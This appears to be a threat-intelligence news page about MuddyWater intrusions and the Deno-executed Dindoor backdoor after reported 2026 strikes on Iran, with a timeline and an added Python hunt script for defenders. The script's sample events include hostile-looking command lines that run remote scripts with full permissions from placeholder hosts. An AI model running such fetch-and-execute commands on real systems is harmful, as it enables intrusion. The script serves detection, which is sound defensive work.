Iran-linked MuddyWater intrusions and heightened retaliation risk after U.S.-Israeli strikes
Following the Feb. 28, 2026 U.S.-Israeli strikes on Iran, reporting indicates a heightened risk of Iranian retaliatory cyber activity against U.S. and allied organizations. Expected operations span ransomware, DDoS (including as cover for deeper intrusions), leaks of previously exfiltrated data, and aggressive social engineering such as fake job offers and malicious attachments. Target sets highlighted include critical infrastructure, banking, and environments with industrial control systems/PLCs; the reporting stresses disciplined execution of security fundamentals (patching, log review, and tighter email/attachment handling) over reliance on automation.
Separately, MuddyWater (also tracked as Seedworm), an Iran-linked APT, was reported active in multiple U.S. organizations since early Feb. 2026, with activity increasing after the strikes. Symantec and Carbon Black researchers described targets including a U.S. bank, an airport, a non-profit, and the Israeli operation of a U.S. software company supplying the defense/aerospace sector, and identified a previously unknown backdoor, Dindoor, on several victims; Dindoor executes via Deno, a JavaScript/TypeScript runtime. Commentary in the reporting also warned to assume potential pre-positioning in high-value targets and recommended proactively hunting for signs of persistent access before it is activated.

How this story unfolded
8 events from the most recent confirmed update back to the earliest known activity.
Augur reports broader Iranian threat activity and hacktivist activation
Augur Security reported elevated activity from multiple Iranian threat groups, including APT33, APT34, APT35, CyberAv3ngers, and Cotton Sandstorm, in the period surrounding the strikes. It also said at least 60 hacktivist groups, including Handala and Cyber Fattah, were activated by Iran after the U.S.-Israel attacks.
Expel reports no confirmed Iran-linked incidents in customer environments
As of early March 2026, Expel said it had not confirmed any Iran-related incidents in its customer environments despite warning of elevated retaliatory cyber risk. The company advised organizations to harden defenses and monitor for Iranian tradecraft and infrastructure shifts.
Researchers identify Dindoor backdoor on victim networks
Broadcom researchers discovered a previously unknown backdoor called Dindoor on several victim networks. The malware was noted for executing via Deno, adding new technical detail to the campaign.
Ayatollah Ali Khamenei dies
Reporting on the campaign linked the apparent retaliatory Iranian cyber activity to the death of Ayatollah Ali Khamenei. The death was cited as occurring on March 1, 2026.
MuddyWater activity intensifies after the strikes on Iran
Researchers said MuddyWater's operations escalated after the February 28 U.S.-Israeli attack on Iran and assessed the campaign as likely retaliatory. The activity was also linked in reporting to the death of Ayatollah Ali Khamenei on March 1.
U.S. and Israeli forces strike Iran
Coordinated U.S. and Israeli strikes against Iran took place on February 28, 2026. Multiple security reports cited the operation as the trigger for heightened concern over Iranian retaliatory cyber activity.
MuddyWater begins activity inside multiple U.S. networks
Broadcom's Symantec and Carbon Black reported that MuddyWater had been active inside multiple U.S. company networks since early February 2026. Identified victims included a U.S. bank, an airport, a non-profit, and the Israeli operation of a U.S. software company serving the defense and aerospace sector.
MuddyWater stages attack infrastructure in September 2025
Augur Security observed more than half a dozen CIDR blocks linked to MuddyWater during a 72-hour period in September 2025, most associated with an Estonian ASN provider. Researchers later assessed with medium confidence that this buildup was preparation for cyber operations following the later U.S.-Israel strikes on Iran.
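The summary notes that Dindoor executes via Deno and that reporting recommended hunting for signs of pre-positioned access before activation; the "Researchers identify Dindoor backdoor" entry above repeats the Deno detail. The story publishes no indicators, so the following is an added hunt heuristic written for this page, not the researchers' detection logic and not Dindoor's actual command lines. It scores constructed process-creation events (field names modelled loosely on Sysmon process-creation records) for Deno-style execution that fetches its entrypoint from the network, requests broad permissions, is spawned by an Office/Outlook parent, or runs from a user-writable path. The sample events, the parent-process list, the path markers and the scoring threshold are all assumptions.

```python
"""Hunt heuristic for Deno-runtime execution in process-creation telemetry.

Added example for this story; constructed data only. Deno's real CLI does
accept `run` with a remote module URL and permission flags such as -A or
--allow-all, which is what the heuristic keys on.
"""
import ipaddress
import shlex
from pathlib import PureWindowsPath
from typing import Optional
from urllib.parse import urlparse

# Constructed sample events (not real telemetry; hosts, paths and URLs are invented).
# 203.0.113.10 is a documentation-range address and .invalid is a reserved TLD.
SAMPLE_EVENTS = [
    {"host": "ws-17", "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Program Files\deno\deno.exe",
     "command_line": r'"C:\Program Files\deno\deno.exe" run --allow-net .\dev\server.ts'},
    {"host": "ws-22", "parent_image": r"C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE",
     "image": r"C:\Users\a.smith\AppData\Local\Temp\deno.exe",
     "command_line": r"deno.exe run -A --no-check https://cdn.example.invalid/update.ts"},
    {"host": "srv-03", "parent_image": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Users\Public\d.exe",
     "command_line": r"d.exe run --allow-all --reload https://203.0.113.10/boot.js"},
    {"host": "ws-05", "parent_image": r"C:\Windows\System32\svchost.exe",
     "image": r"C:\Windows\System32\notepad.exe", "command_line": "notepad.exe"},
]

# Assumption: mail and Office images stand in for the "malicious attachment" vector
# the reporting describes; extend to match your environment.
ATTACHMENT_PARENTS = {"outlook.exe", "winword.exe", "excel.exe", "powerpnt.exe"}
# Assumption: path fragments that indicate a user-writable, non-installer location.
USER_WRITABLE_MARKERS = ("\\appdata\\", "\\temp\\", "\\users\\public\\", "\\downloads\\")


def tokenize(command_line: str) -> list:
    # posix=False keeps Windows backslashes intact; quotes stay on tokens, so strip them.
    return [t.strip('"') for t in shlex.split(command_line, posix=False)]


def looks_like_deno(image: str, tokens: list) -> bool:
    if PureWindowsPath(image).name.lower() in ("deno.exe", "deno"):
        return True
    # A renamed binary still betrays itself: `run` plus Deno-style permission flags.
    return "run" in tokens and any(t == "-A" or t.startswith("--allow-") for t in tokens)


def entrypoint(tokens: list) -> Optional[str]:
    # The first non-flag token after `run` is the module Deno will execute.
    if "run" not in tokens:
        return None
    for t in tokens[tokens.index("run") + 1:]:
        if not t.startswith("-"):
            return t
    return None


def score_event(event: dict) -> Optional[dict]:
    tokens = tokenize(event["command_line"])
    if not looks_like_deno(event["image"], tokens):
        return None
    reasons = []
    if any(t in ("-A", "--allow-all") for t in tokens):
        reasons.append("broad_permissions")
    ep = entrypoint(tokens)
    if ep:
        url = urlparse(ep)
        if url.scheme in ("http", "https"):
            reasons.append("remote_entrypoint")      # code fetched over the network at launch
            try:
                ipaddress.ip_address(url.hostname or "")
                reasons.append("ip_literal_host")    # no DNS name, common in staging infra
            except ValueError:
                pass
    if PureWindowsPath(event["parent_image"]).name.lower() in ATTACHMENT_PARENTS:
        reasons.append("attachment_capable_parent")
    if any(m in event["image"].lower() for m in USER_WRITABLE_MARKERS):
        reasons.append("user_writable_image_path")
    return {"host": event["host"], "score": len(reasons), "reasons": reasons}


def hunt(events: list, min_score: int = 2) -> list:
    # Developers running Deno from an installed path against local files score 0 and drop out.
    hits = [r for r in (score_event(e) for e in events) if r and r["score"] >= min_score]
    return sorted(hits, key=lambda r: -r["score"])


if __name__ == "__main__":
    for hit in hunt(SAMPLE_EVENTS):
        print(f'{hit["host"]}: score={hit["score"]} reasons={", ".join(hit["reasons"])}')
```

On the constructed events, the installed Deno launched from Explorer against a local file scores zero and is suppressed, while the copy executed from a Temp directory under Outlook with `-A` and a remote module, and the renamed binary in `Users\Public` pulling a script from an IP literal, both surface with every reason attached. Treat the output as triage input for the hunt the reporting recommends, not as a verdict, and tune `min_score` and the assumption lists against a baseline of legitimate Deno use in your environment.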